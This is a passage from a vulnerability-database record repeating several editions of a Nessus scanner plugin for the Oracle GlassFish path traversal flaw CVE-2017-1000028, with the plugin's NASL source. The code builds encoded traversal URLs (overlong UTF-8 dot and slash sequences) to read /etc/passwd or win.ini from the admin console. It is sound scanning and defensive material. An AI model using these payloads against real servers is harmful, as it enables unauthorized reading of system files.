Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2018-06-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=110192", "reporter": "Tenable", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2019-01-16T20:35:30", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"modified": "2019-01-16T20:35:30", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}]}, "score": {"modified": "2019-01-16T20:35:30", "value": 5.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-01-16T20:35:30", "differentElements": ["cvss", "cvss3", "href", "modified", "reporter"], "edition": 1}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "55af9630950fc92cc5dbef23d81a2fa41f814ac00be303a744e0fe6330867eac", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2020-04-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2020-04-01T00:27:33", "history": [], "viewCount": 125, "enchantments": {"dependencies": {"modified": "2020-04-01T00:27:33", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-04-01T00:27:33", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-04-01T00:27:33", "differentElements": ["modified"], "edition": 2}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "2752939603e3ef7de5a581491915cf34163601c646d201151b2d9cc65f6a8899", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-01-01T03:03:30", "history": [], "viewCount": 137, "enchantments": {"dependencies": {"modified": "2021-01-01T03:03:30", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-01-01T03:03:30", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-01T03:03:30", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "fe12f9b912190b457e723707f33eb056ce3a6a390eae7e44f59ae804212944d6", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-02T00:39:56", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"modified": "2021-07-02T00:39:56", "references": [{"idList": ["UB:CVE-2017-1000028"], "type": "ubuntucve"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-07-02T00:39:56", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
